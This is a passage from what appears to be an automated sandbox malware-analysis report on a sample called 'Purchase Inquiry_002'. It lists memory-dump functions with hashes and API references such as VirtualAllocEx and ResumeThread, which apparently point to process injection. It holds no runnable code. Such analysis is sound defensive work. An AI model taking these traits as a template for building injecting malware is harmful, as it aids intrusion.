                                Function 06D90F80 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D90FF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e4d58622ca6ec65ea5548af88f7c7037a944f457face6352f77b6a00226a3a5b
                                • Instruction ID: 17fe6debe347b2df06e0218bdd802d4c0ef88a5664f5b3cae507ecb2e8d4114b
                                • Opcode Fuzzy Hash: e4d58622ca6ec65ea5548af88f7c7037a944f457face6352f77b6a00226a3a5b
                                • Instruction Fuzzy Hash: 772167768003499FDB20DFAAC844BDEBBF5EF48320F248819E529A7250C775A954CFA0
                                Function 06D84FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: fad10a42f2aeb75d88b5518542fa7882b15afd5eaa1efb69e39fcf7b3b2ba5bb
                                • Instruction ID: c1b2d3578812e04d6c77b7f08fbb23e75ffd275f5e1221415dc44a0769f0c8d6
                                • Opcode Fuzzy Hash: fad10a42f2aeb75d88b5518542fa7882b15afd5eaa1efb69e39fcf7b3b2ba5bb
                                • Instruction Fuzzy Hash: A4E18078E00218CFDB90DFA9D880A9DBBF2FB49214F2485AAD819E7345D7319A85CF50
                                Function 06D90F88 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D90FF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8bab2299e976e077e2377b15890009055f2d72ce505e38e01e68b6a3b50a3d93
                                • Instruction ID: d3850b38e4836e91e933505b1fb744b0a3794fe40e78ed00cebac600d392c381
                                • Opcode Fuzzy Hash: 8bab2299e976e077e2377b15890009055f2d72ce505e38e01e68b6a3b50a3d93
                                • Instruction Fuzzy Hash: 3A1126769003499FDF20DFAAC844BDEBBF5EF48320F248419E529A7250C775A950CBA0
                                Function 06D90DF9 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 604ca1df2060a57e74f781d3d8cfb640928e967ccccbb96bb34c86ef6ccff677
                                • Instruction ID: da9405651c0b1e7bc066b17e6e6bb69949bf7624bfe85a1d895670aad8f23e3b
                                • Opcode Fuzzy Hash: 604ca1df2060a57e74f781d3d8cfb640928e967ccccbb96bb34c86ef6ccff677
                                • Instruction Fuzzy Hash: 3C1146B5D003488FDB20DFAAD8457EFFBF5EF88220F248419D419A7250CB796941CBA4
                                Function 06D90E00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 1cd88b2e5678b08e357af93c4c20c77f4201efc02c26b2e2f1e892c7e7fa6a17
                                • Instruction ID: 0e877d1b051e655e548bb8b74617649c1ec0e749970685ec8cc18f9b012f8e83
                                • Opcode Fuzzy Hash: 1cd88b2e5678b08e357af93c4c20c77f4201efc02c26b2e2f1e892c7e7fa6a17
                                • Instruction Fuzzy Hash: 631136B1D003488FDB24DFAAD4447EEFBF5EF88220F248419D419A7250CB79A944CBA4
                                Function 06D95590 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 06D955F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: de732b669dd70ca7636961a1f55aafe955ea63a03ff6c3e1e93dfd0e2215fbe6
                                • Instruction ID: 89edd1a36d0e3bef50b52f363b4918f02a003d9264b74715be86848395323de5
                                • Opcode Fuzzy Hash: de732b669dd70ca7636961a1f55aafe955ea63a03ff6c3e1e93dfd0e2215fbe6
                                • Instruction Fuzzy Hash: BE1113B58003499FDB20DF9AD444BDEBBF8EB48310F208819D958A7211C375A584CFA5
                                Function 0281AF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0281AFBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 9521466974a6a2fbe81869cbb915d1f3facb91f2471b21a5e88dd55d1d999b92
                                • Instruction ID: f9e4587740f0f6448af2b9d737c6ddd79bcdd85f210f5485b6fc14edc5550945
                                • Opcode Fuzzy Hash: 9521466974a6a2fbe81869cbb915d1f3facb91f2471b21a5e88dd55d1d999b92
                                • Instruction Fuzzy Hash: AB1113BAC003498FCB14CF9AD444BDEFBF9EB88224F10841AD429A7650C375A545CFA1
                                Function 06D95598 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 06D955F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 77d7bef9148f1b28ca2b67a36917c4a841b1267fb92cedcba75e6f286614ece6
                                • Instruction ID: 875ac083f0e4aa2fa23eb2849d564b5579e22a51280057e4787d2b79d2673218
                                • Opcode Fuzzy Hash: 77d7bef9148f1b28ca2b67a36917c4a841b1267fb92cedcba75e6f286614ece6
                                • Instruction Fuzzy Hash: F411E5B5800349DFDB20DF9AD945BDEFBF8EB48310F108419D958A7610C375A944CFA5
                                Function 06D87450 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: m
                                • API String ID: 0-3775001192
                                • Opcode ID: 2b5bc060ddc7eb844e2022fec283a982412a19207dab677e41b53c7275c286aa
                                • Instruction ID: b0c58be988692b8ffaf0fa30c602af8c153d75f9c74b0c48d9479de7cd48a42e
                                • Opcode Fuzzy Hash: 2b5bc060ddc7eb844e2022fec283a982412a19207dab677e41b53c7275c286aa
                                • Instruction Fuzzy Hash: 4CE08C70D0420C9FDB84FFA8D44826D7BB8E788300F2101A9C44553240DB714A44CAA1
                                Function 06D83348 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6
                                • API String ID: 0-498629140
                                • Opcode ID: 4bcbe85911a0dac0f94f675bd6463c00f95fb8500816b02c2d79ab74299bef71
                                • Instruction ID: 4f45eee11182ad7a099f46d386c93d0a5dcfd0fb11cd6042f4e4c92c0cc8f5cd
                                • Opcode Fuzzy Hash: 4bcbe85911a0dac0f94f675bd6463c00f95fb8500816b02c2d79ab74299bef71
                                • Instruction Fuzzy Hash: 16E08C70C04208EFDB50EFE0D40926EBFB8E705201F1185A9D40993240EB719E40D681
                                Function 06D84038 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: 7
                                • API String ID: 0-1790921346
                                • Opcode ID: b42ddecdcdbab4450b9079534be59dc25681f855861829485798f223c919fcc2
                                • Instruction ID: 8363ba81c7077bf6a7ad12d17c5cd60c0b27976bc2fb4e88a92c4c0bf8f94fbf
                                • Opcode Fuzzy Hash: b42ddecdcdbab4450b9079534be59dc25681f855861829485798f223c919fcc2
                                • Instruction Fuzzy Hash: 13E0C230C0520CDFCB90FFF5E40A76EBBF8E744204F5101A9C40A53240E7744A44C691
                                Function 06D82C38 Relevance: .4, Instructions: 435COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9280e9cba90c410afcc51ec5dc9f0cba5f8238e9d6f5c25140925a7388ede6ee
                                • Instruction ID: dd8446946d68337ef593dcbfb5aca53223253417c9bb6e8332e1ae6a91705f7c
                                • Opcode Fuzzy Hash: 9280e9cba90c410afcc51ec5dc9f0cba5f8238e9d6f5c25140925a7388ede6ee
                                • Instruction Fuzzy Hash: BCE1AC30B102158FDB99EFB9C85866E7BFAAF89701B254469E406EB361DE70CD41CBD0
                                Function 06D83D9E Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f40fbcc214964ecbc3927b648d66f0b5246b6a93343d0d4c887418a288a25d5e
                                • Instruction ID: 225d7a0b71eb48a7d7716ecf11ec9c2c6f599e9d710abdbac7364204b93867e8
                                • Opcode Fuzzy Hash: f40fbcc214964ecbc3927b648d66f0b5246b6a93343d0d4c887418a288a25d5e
                                • Instruction Fuzzy Hash: 8E91E574E042089FDB55DFE9C4846AEBBF2EF89710F20856AE819EB345D7359902CF40
                                Function 06D86D37 Relevance: .2, Instructions: 193COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85f927b5cc24c3016836e29ba0719ca6ba2412f8cac15aeb2b40f52d9bec3191
                                • Instruction ID: e6ae930a54b0dbaaca25477bc85d4406d4a91faf0a8a479c0aab3bdf29e56a82
                                • Opcode Fuzzy Hash: 85f927b5cc24c3016836e29ba0719ca6ba2412f8cac15aeb2b40f52d9bec3191
                                • Instruction Fuzzy Hash: 4B81B174E042598FDF51DFA8C884AAEBBB2EF49314F1084A9E809EB305E731D946CF40
                                Function 06D880EA Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f267d72c8c8e33dab1fc9c9014230ea091fcf4249ae5dfabccd0e3cea1e8279a
                                • Instruction ID: 694fa12a658f0ad402de09eb107ac23156c4f5963187174120d97e8ee6a417e5
                                • Opcode Fuzzy Hash: f267d72c8c8e33dab1fc9c9014230ea091fcf4249ae5dfabccd0e3cea1e8279a
                                • Instruction Fuzzy Hash: D0619E78E042188FDB50DFA9C984AADFBF1BF49300F6495A9E819E7306D734A941DF50
                                Function 06D8AE20 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3d1703c035e8805098f80b7e22692754f2f8c8a8f425ad86e1f89ece3ec5c6d6
                                • Instruction ID: 6b974f2555a14ff9c162dd405fc827c5738c16ce1a97c0ae766dd7eeb5702e80
                                • Opcode Fuzzy Hash: 3d1703c035e8805098f80b7e22692754f2f8c8a8f425ad86e1f89ece3ec5c6d6
                                • Instruction Fuzzy Hash: 7751E674E05208CFDB45DFE9C884AAEBBB6AF89300F14902AE819AB355DB349945CF50
                                Function 06D84894 Relevance: .2, Instructions: 162COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd6420bbb0fad17363a607e30c98a335ee75c1a09af0d8ab21a91021c6b50f2f
                                • Instruction ID: 12b9f73366dd90a3e98ae6b227128afc55cc444301cebbae47f6fcfee8a88d8e
                                • Opcode Fuzzy Hash: fd6420bbb0fad17363a607e30c98a335ee75c1a09af0d8ab21a91021c6b50f2f
                                • Instruction Fuzzy Hash: E251D435B102058FCB41EB799C889BFBBF7EFC52107148569E465DB391DB309C068B61
                                Function 06D8AE30 Relevance: .2, Instructions: 161COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1701cd5d654f6fbccb7f43462db5ceb633911b1aacb67c9199e193032f13a3b5
                                • Instruction ID: 3b803316eaa10a0c135a48144d58f191ce944706726f5cb7dc04fd2427dadbdd
                                • Opcode Fuzzy Hash: 1701cd5d654f6fbccb7f43462db5ceb633911b1aacb67c9199e193032f13a3b5
                                • Instruction Fuzzy Hash: 2851A574E05208CFDB49DFE9D488AADBBB6FF89300F14902AE919AB355DB319845CF50
                                Function 06D886E0 Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: adca8e1c8e5d69235696b65fa745689eed9a30d4c6b1271533ef512d45e0341e
                                • Instruction ID: 5da46ebee6c71cecbf5ca90fdab5b9e278c5fe4ff7bd3b0bb8ece4986652c649
                                • Opcode Fuzzy Hash: adca8e1c8e5d69235696b65fa745689eed9a30d4c6b1271533ef512d45e0341e
                                • Instruction Fuzzy Hash: FF41E878E00208DFDB44EFA9D884AAEB7F6EB89310F54856AD815E7351DB359D02CF90
                                Function 06D886CF Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a794f3221248c56583453331743a9a3cf95f88a1720c782c30e06f89133c4fe6
                                • Instruction ID: 8f56a2cd41b9c8a2bb741f55ae80fa8c6245d84c863f8466c49ca448bf45598f
                                • Opcode Fuzzy Hash: a794f3221248c56583453331743a9a3cf95f88a1720c782c30e06f89133c4fe6
                                • Instruction Fuzzy Hash: 2F410874E00208DFDB44EFA8D884AAEB7B2EB89310F54886AD815EB350DB35DD06CB50
                                Function 06D84428 Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 036ecba6caf4bc2359408ff210b3e0afa8c49a92603767d541a6fc5e77da87f4
                                • Instruction ID: 45f5464f0d93f31c7e1c0c70360d7fcdc3b52750a220f8c4c8a0a9caf35ed2f4
                                • Opcode Fuzzy Hash: 036ecba6caf4bc2359408ff210b3e0afa8c49a92603767d541a6fc5e77da87f4
                                • Instruction Fuzzy Hash: D241E874E00209DFDB44EFA8D4949AEBBF2FB89300F10846AE819A7354DB319D42CF94
                                Function 06D82FB0 Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40ce815ed392abe67fb258c726671921d41995a454ecd5bdfd8f08b73eea0b0a
                                • Instruction ID: f0dd4b47c6fe054ba26120edc2b98b5474b558057d0e469ca1f0d8317239d9d6
                                • Opcode Fuzzy Hash: 40ce815ed392abe67fb258c726671921d41995a454ecd5bdfd8f08b73eea0b0a
                                • Instruction Fuzzy Hash: C2410474E1020A9FDB45DFBAD85A5AEBBF5AF49741F118429E806E7250EB30D900CF60
                                Function 06D8592C Relevance: .1, Instructions: 104COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d859ecc3dcea6ee714b0dc208a280625041fee2f18f186a4975ff4b024ceed57
                                • Instruction ID: dbcd7501f6fd852fa5b74f388377ec0af3463e33445d31f1f08cecd0234a9e2a
                                • Opcode Fuzzy Hash: d859ecc3dcea6ee714b0dc208a280625041fee2f18f186a4975ff4b024ceed57
                                • Instruction Fuzzy Hash: 13316D71900208AFCB50DFA9D888ADEBFF9EF48310F10846AE819E7210D7759945CFA0
                                Function 06D84417 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c298aa229ca1edaafeaea45427e928051716d2ecdf3dfd51336d90dee9295fe
                                • Instruction ID: 2f226573756b131412f3526461e930ccd12180db3143d07e0f0f560ab32da8bd
                                • Opcode Fuzzy Hash: 3c298aa229ca1edaafeaea45427e928051716d2ecdf3dfd51336d90dee9295fe
                                • Instruction Fuzzy Hash: BC412C74E002099FCB44DFA8D4949AEBBF2FB89300F1084AAE819AB354DB319D06CF54
                                Function 06D85AB0 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74b012cc7bdabdb335e8fbda512f930793ee7e57a7a8599e07baf25ef279d941
                                • Instruction ID: ebd4ed3b35bef996ef8152760da60cd670ab497816c0da15fe43471e8449448c
                                • Opcode Fuzzy Hash: 74b012cc7bdabdb335e8fbda512f930793ee7e57a7a8599e07baf25ef279d941
                                • Instruction Fuzzy Hash: BC2126B69043500FDB42EB789C547EF7BB2EFC5120B45846AD4A5CB241EA308909C7B1
                                Function 0260D3D8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340300848.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_260d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a97c7ef5b1022954149ef9d2955f1103a0e534e17f7fe100813ad630fcfa6dc
                                • Instruction ID: aae6fd35827d5bd235ecf8d304c0c6766e2abbd0364012233183ced514ec8cc3
                                • Opcode Fuzzy Hash: 5a97c7ef5b1022954149ef9d2955f1103a0e534e17f7fe100813ad630fcfa6dc
                                • Instruction Fuzzy Hash: 9C2128B1504204DFDB0DDF54D9C0B2BBB65FB84324F24C269E90A0B396C336E456DAA2
                                Function 06D84ED8 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e04276680e2401932ab7498ac8e14cddd1145862041238236cd7c807eefe497
                                • Instruction ID: 604dc5530f181dd72a1d904e28c24fd2530ce9b19e1e7aabbe0e6b0cef6d3798
                                • Opcode Fuzzy Hash: 8e04276680e2401932ab7498ac8e14cddd1145862041238236cd7c807eefe497
                                • Instruction Fuzzy Hash: BB314FB4E1021ADFDB80DFA9D5856EEBBF4AB48314F1084AAE815F7340E7349A40CF60
                                Function 0261D1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4507660998cf289225993302dfaa73501dbcf6b90911ba1aea4ee9e37651ce59
                                • Instruction ID: cac38bafba2f53033f577dbac889fc9f733a1ce74757699189844674afed1f87
                                • Opcode Fuzzy Hash: 4507660998cf289225993302dfaa73501dbcf6b90911ba1aea4ee9e37651ce59
                                • Instruction Fuzzy Hash: 8F213B71504344EFDB09DF14D5C0B25BBA5FB84314F28C66DDA0A4B356C336E446CB61
                                Function 0261D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1340769432.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_261d000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40b458f0b3b47990fa6730add752739479dbd215f132d77e75be9f0598e7ea2e
                                • Instruction ID: aa950fc0df7a96dcd6ab5c85625b54ac9395e018315048225f13d5ecd4d06ccc
                                • Opcode Fuzzy Hash: 40b458f0b3b47990fa6730add752739479dbd215f132d77e75be9f0598e7ea2e
                                • Instruction Fuzzy Hash: 7B21F275604384DFDB18DF14D980B26BBA5EB84315F28C56DD80A4B396C33BE847CA62
                                Function 06D85C94 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71bb99c09155ba0b827bcc0af85ffd1d224c30b3f8325eb8faf94a406d621a48
                                • Instruction ID: 679937b89cda0920dc981723f73160c3dc7c3737e8eb4caa97163627c5353de3
                                • Opcode Fuzzy Hash: 71bb99c09155ba0b827bcc0af85ffd1d224c30b3f8325eb8faf94a406d621a48
                                • Instruction Fuzzy Hash: 7E31E4B4C01218DFDB60DF99D989BCEBFF5AB48310F248459E404AB250C3B55885CBA1
                                Function 06D84EC9 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28dee353893137bfe7d2cbc3de8255deaddb69b6d15b710707d92dce2e49f060
                                • Instruction ID: be94a66db7ea866aa89748b34396624c74403818bd82a05261e5ef7ac79153a4
                                • Opcode Fuzzy Hash: 28dee353893137bfe7d2cbc3de8255deaddb69b6d15b710707d92dce2e49f060
                                • Instruction Fuzzy Hash: B02195B4D1124ADFCB41DFA9C9456EEBBF0EB49214F1085AAE814E7350E7349A41CFA1
                                Function 06D86FA0 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5af285ce5e3934e3f54bc3f1bd158a660edf3c4e5790958c9e8353533fe1490
                                • Instruction ID: f77d31daf3ae4afed97aee568eabf79de59f99d2fbc46d7ac1d1b577be23d9a6
                                • Opcode Fuzzy Hash: c5af285ce5e3934e3f54bc3f1bd158a660edf3c4e5790958c9e8353533fe1490
                                • Instruction Fuzzy Hash: 1C11E370B19384AFCB46EB708D598AE7FF99F4210071544E7E805CB283EA358E0AC762
                                Function 06D85748 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5fe3b1c389fe0edaaac3f8d97b240aeb5220fade068597dc56210e8b72c309b
